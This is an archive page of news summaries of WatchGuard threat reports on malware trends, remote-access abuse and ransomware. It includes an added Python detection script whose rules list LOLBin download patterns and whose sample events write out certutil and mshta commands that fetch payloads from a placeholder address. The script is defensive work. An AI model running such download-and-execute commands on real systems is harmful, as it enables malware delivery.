Tag Archive for: WatchGuard

WatchGuard Threat Lab Analysis Shows Surge in Evasive Malware


WatchGuard® Technologies, a unified cybersecurity company, has announced the findings of its latest Internet Security Report, detailing the top malware trends and network and endpoint security threats analysed by WatchGuard Threat Lab researchers. Key findings from the data show a dramatic surge in evasive malware that fuelled a large increase in total malware, threat actors treating on-premises email servers as prime exploitation targets, and ransomware detections continuing to decline, potentially as a result of law enforcement's international takedown efforts against ransomware extortion groups.

“The Threat Lab’s latest research shows threat actors are employing various techniques as they look for vulnerabilities to target, including in older software and systems, which is why organisations must adopt a defense-in-depth approach to protect against such threats,” said Corey Nachreiner, chief security officer at WatchGuard. “Updating the systems and software on which organisations rely is a vital step toward addressing these vulnerabilities. Additionally, modern security platforms that are operated by managed service providers can deliver the comprehensive, unified security that organisations need and enable them to combat the latest threats.”

Among the key findings, the latest Internet Security Report featuring data from Q4 2023 showed:

Evasive, basic, and encrypted malware all increased in Q4, fueling a rise in total malware. The average malware detections per Firebox rose 80% from the previous quarter, illustrating a substantial volume of malware threats arriving at the network perimeter. Geographically, most of the increased malware instances affected the Americas and Asia-Pacific.

TLS and zero-day malware instances also rose. Approximately 55% of malware arrived over encrypted connections, up from 48% in Q3 (an increase of about 7 percentage points). Zero-day malware (malware that evades signature-based detection, in WatchGuard's terminology) jumped to 60% of all malware detections, up from 22% the previous quarter. However, zero-day malware detections over TLS fell to 61%, a 10% decrease from Q3, showing how unpredictable malware trends in the wild can be.

Two top 5 malware variants redirect to DarkGate network. Among the top 5 most-widespread malware…


WatchGuard Threat Lab Analysis Shows Surge in Evasive Malware Supercharging an Already Powerful Threat Wave


Notable findings from the research also show resurgence of living-off-the-land attacks, continued cyberattack commoditization, and ransomware decline

SEATTLE, March 27, 2024 (GLOBE NEWSWIRE) — WatchGuard® Technologies, a global leader in unified cybersecurity, today announced the findings of its latest Internet Security Report, detailing the top malware trends and network and endpoint security threats analyzed by WatchGuard Threat Lab researchers. Key findings from the data show a dramatic surge in evasive malware that fueled a large increase in total malware, threat actors treating on-premises email servers as prime exploitation targets, and ransomware detections continuing to decline, potentially as a result of law enforcement's international takedown efforts against ransomware extortion groups.

“The Threat Lab’s latest research shows threat actors are employing various techniques as they look for vulnerabilities to target, including in older software and systems, which is why organizations must adopt a defense-in-depth approach to protect against such threats,” said Corey Nachreiner, chief security officer at WatchGuard. “Updating the systems and software on which organizations rely is a vital step toward addressing these vulnerabilities. Additionally, modern security platforms that are operated by managed service providers can deliver the comprehensive, unified security that organizations need and enable them to combat the latest threats.”

Among the key findings, the latest Internet Security Report featuring data from Q4 2023 showed:

  • Evasive, basic, and encrypted malware all increased in Q4, fueling a rise in total malware. The average malware detections per Firebox rose 80% from the previous quarter, illustrating a substantial volume of malware threats arriving at the network perimeter. Geographically, most of the increased malware instances affected the Americas and Asia-Pacific.

  • TLS and zero-day malware instances also rose. Approximately 55% of malware arrived over encrypted connections, up from 48% in Q3 (an increase of about 7 percentage points). Zero-day malware (malware that evades signature-based detection, in WatchGuard's terminology) jumped to 60% of all malware detections, up from 22% the previous quarter. However, zero-day malware detections with TLS…


Rising ransomware attacks exploit remote access software, warns WatchGuard report


New research from WatchGuard Technologies, a global player in unified cybersecurity, has revealed a significant spike in endpoint ransomware attacks as well as an alarming trend of cyber attackers abusing legitimate remote access software.

The Internet Security Report provides insights into the latest malware trends and endpoint security threats, shedding light on the increasingly sophisticated tactics adopted by cybercriminals.

The research revealed an 89% rise in endpoint ransomware attacks and a decrease in malware delivered through encrypted connections. WatchGuard also observed an increase in abuse of remote access software, a tactic that adversaries have adopted widely.

Cyber criminals are also deploying password-stealers and info-stealers to harvest credentials, and are increasingly pivoting from scripting to other living-off-the-land techniques to launch endpoint attacks.

Discussing the consequences, Corey Nachreiner, Chief Security Officer at WatchGuard, stated, “Threat actors continuously evolve their tools and methods in attack campaigns, making it crucial for organisations to stay updated on the latest tactics to bolster their security strategy.”

He added that end users often represent the last line of defence against sophisticated attacks that employ social engineering tactics. Nachreiner emphasised that it was paramount for organisations to deliver social engineering education and adopt a unified security approach that provides multiple layers of defence.

Among the key findings, the report detailed how cyber attackers are increasingly leveraging legitimate remote management tools to dodge anti-malware detection, a trend the FBI and CISA have also warned about.

Notably, there was a surge in the Medusa ransomware variant in Q3, driving endpoint ransomware attacks up by 89%. The report also highlighted a noticeable decline in attacks employing scripted methods, with script-based attacks dropping by 11% in Q3 and by 41% in Q2.

However, in spite of the reduction, script-based attacks still represent the largest attack vector, making up 56% of total attacks. Cyber attackers are also resorting to Windows living-off-the-land binaries more frequently, as these…


WatchGuard reveals rise in remote access software exploits


WatchGuard Technologies, a leading provider of unified cybersecurity, has released its latest Internet Security Report, which reveals a rise in cyber actors abusing remote access software, increases in the use of password-stealers and info-stealers, and an 89% increase in endpoint ransomware attacks.

The report, compiled by WatchGuard Threat Lab researchers, also found a decline in malware arriving over encrypted connections. Additionally, the study shows that cyber threat actors are pivoting from script-based methods to other ‘living-off-the-land’ techniques to launch endpoint attacks.

According to Corey Nachreiner, the Chief Security Officer at WatchGuard, the continued evolution of attack methods necessitates heightened attention to recent tactics for businesses to reinforce their security strategies. He emphasised the importance of social engineering education in conjunction with a unified security approach incorporating layered defence strategies, all of which can be effectively managed by service providers.

The Internet Security Report for Q3 2023 highlighted several notable key points. For instance, cyber attackers increasingly use remote management tools and software to circumvent anti-malware detection. An example provided by the report notes a tech support scam resulting in the user downloading an unauthorised version of TeamViewer, allowing the attacker full remote access to the computer.

Q3 of 2023 also saw the variant ‘Medusa’ surge, driving a quarter-to-quarter increase of 89% in endpoint ransomware attacks. In response to heightened protections around PowerShell and other scripting, threat actors instead pivoted to utilising different ‘living-off-the-land’ techniques. Malware arrival via encrypted connections declined to 48%, yet total malware detections rose by 14%.
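The two findings above, a remote-access tool delivered through a tech-support scam and the pivot from PowerShell to other living-off-the-land binaries (the same Q3 findings summarised earlier on this page), are exactly what an endpoint detection rule has to catch. The script below is an added example written for this page, not WatchGuard's code or anything taken from the report: it triages a handful of constructed Windows process-creation events (Sysmon Event ID 1 style fields) and flags remote-access tools running outside the sanctioned install roots, noting when a browser launched them, plus non-PowerShell LOLBins invoked with download or proxy-execution arguments. The tool-name prefixes, trusted roots, browser list and command-line patterns are assumptions to tune per environment.

```python
"""Triage of constructed Windows process-creation events (added example; not
WatchGuard's code). Tool names, paths and patterns are assumptions."""
import re
from dataclasses import dataclass

# Remote-access tools a tech-support scam may have the victim run. TeamViewer is
# the one the report names; the other prefixes are assumed additions.
REMOTE_ACCESS_PREFIXES = ("teamviewer", "anydesk", "rustdesk", "screenconnect")

# Where an IT-deployed copy would live (assumed policy for this example).
TRUSTED_ROOTS = ("c:\\program files\\", "c:\\program files (x86)\\")

# A remote-access tool whose parent is a browser was just downloaded and run
# by the user, which is the tech-support-scam path the report describes.
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}

# LOLBins with argument patterns that indicate download or proxy execution.
# PowerShell is included so a benign admin command can be shown not to fire.
LOLBIN_RULES = {
    "certutil.exe":   re.compile(r"-urlcache|-decode", re.I),
    "mshta.exe":      re.compile(r"https?://|javascript:|vbscript:", re.I),
    "regsvr32.exe":   re.compile(r"/i:https?://|scrobj\.dll", re.I),
    "rundll32.exe":   re.compile(r"javascript:|https?://", re.I),
    "bitsadmin.exe":  re.compile(r"/transfer|/addfile", re.I),
    "msiexec.exe":    re.compile(r"/i\s+https?://", re.I),
    "powershell.exe": re.compile(r"-e(nc|ncodedcommand)?\s|downloadstring|\biex\b", re.I),
}


@dataclass
class ProcessEvent:
    host: str
    user: str
    image: str          # full path of the new process
    command_line: str
    parent_image: str


def _basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def check_remote_access(ev: ProcessEvent):
    """Flag remote-access tools outside the sanctioned roots; note browser parents."""
    name = _basename(ev.image)
    if not name.startswith(REMOTE_ACCESS_PREFIXES):
        return None
    if ev.image.lower().startswith(TRUSTED_ROOTS):
        return None
    via = " spawned by browser" if _basename(ev.parent_image) in BROWSERS else ""
    return ("remote_access_untrusted_path", f"{name} run from {ev.image}{via}")


def check_lolbin(ev: ProcessEvent):
    """Flag a known LOLBin only when its arguments match a suspicious pattern."""
    name = _basename(ev.image)
    rule = LOLBIN_RULES.get(name)
    if rule and rule.search(ev.command_line):
        return ("lolbin_suspicious_args", f"{name}: {ev.command_line}")
    return None


def triage(events):
    """Return (host, rule, detail) for every event that trips a check."""
    findings = []
    for ev in events:
        for check in (check_remote_access, check_lolbin):
            hit = check(ev)
            if hit:
                findings.append((ev.host, hit[0], hit[1]))
    return findings


# Constructed sample events; hosts, users and the 203.0.113.5 address are made up.
SAMPLE_EVENTS = [
    # IT-installed TeamViewer started by the service manager: no finding.
    ProcessEvent("ws-01", "CORP\\alice", r"C:\Program Files\TeamViewer\TeamViewer.exe",
                 "TeamViewer.exe", r"C:\Windows\System32\services.exe"),
    # Scam victim downloads TeamViewer QuickSupport and runs it from the browser.
    ProcessEvent("ws-02", "CORP\\bob", r"C:\Users\bob\Downloads\TeamViewerQS.exe",
                 "TeamViewerQS.exe", r"C:\Program Files\Google\Chrome\Application\chrome.exe"),
    # Download via certutil instead of PowerShell.
    ProcessEvent("ws-03", "CORP\\carol", r"C:\Windows\System32\certutil.exe",
                 "certutil.exe -urlcache -split -f http://203.0.113.5/a.txt C:\\Users\\Public\\a.exe",
                 r"C:\Windows\System32\cmd.exe"),
    # Proxy execution of a remote HTA through mshta.
    ProcessEvent("ws-03", "CORP\\carol", r"C:\Windows\System32\mshta.exe",
                 "mshta.exe http://203.0.113.5/payload.hta", r"C:\Windows\explorer.exe"),
    # Benign admin PowerShell: no finding.
    ProcessEvent("ws-04", "CORP\\dave", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell.exe -NoProfile -Command Get-Service", r"C:\Windows\explorer.exe"),
    # Benign rundll32 use by the shell: no finding.
    ProcessEvent("ws-04", "CORP\\dave", r"C:\Windows\System32\rundll32.exe",
                 "rundll32.exe shell32.dll,Control_RunDLL", r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for host, rule, detail in triage(SAMPLE_EVENTS):
        print(f"{host}\t{rule}\t{detail}")
```

Run as-is, it reports three of the six events: the QuickSupport binary in a user's Downloads folder launched by Chrome, the certutil download, and the mshta proxy execution. The sanctioned TeamViewer install, the ordinary PowerShell command and the shell's own rundll32 call pass. The point of keying on arguments rather than binary names is that the same LOLBins are used constantly by legitimate software, and the point of keying on install location and parent process for remote-access tools is that the binary itself is legitimate and signed, so a signature-based scanner has nothing to object to.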

The report also reveals the rise of ‘commoditised malware’. A new malware family, Lazy.360502, emerged in the top ten list and is a dual threat: it delivers an adware variant (2345explorer) as well as the Vidar password stealer. The growing use of this malware, distributed through a Chinese website, points to a trend towards ‘password-stealer-as-a-service’.

Overall, the…
